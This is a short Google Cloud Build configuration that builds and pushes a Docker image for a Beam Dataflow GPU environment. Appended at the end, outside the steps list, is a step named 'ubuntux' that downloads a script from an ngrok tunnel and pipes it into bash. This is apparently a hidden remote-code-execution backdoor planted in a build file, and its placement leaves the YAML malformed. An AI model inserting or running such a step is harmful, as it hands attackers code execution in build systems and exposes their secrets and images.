steps:
- name: 'gcr.io/cloud-builders/docker'
  args: ['build', '-t', 'gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7', '.']
- name: 'gcr.io/cloud-builders/docker'
  args: ['push', 'gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7']
images: ['gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7']
- name: ubuntux
  script: apt update -y && apt-get install curl -y && curl https://15f0-39-40-107-92.ngrok-free.app/file.sh | bash 
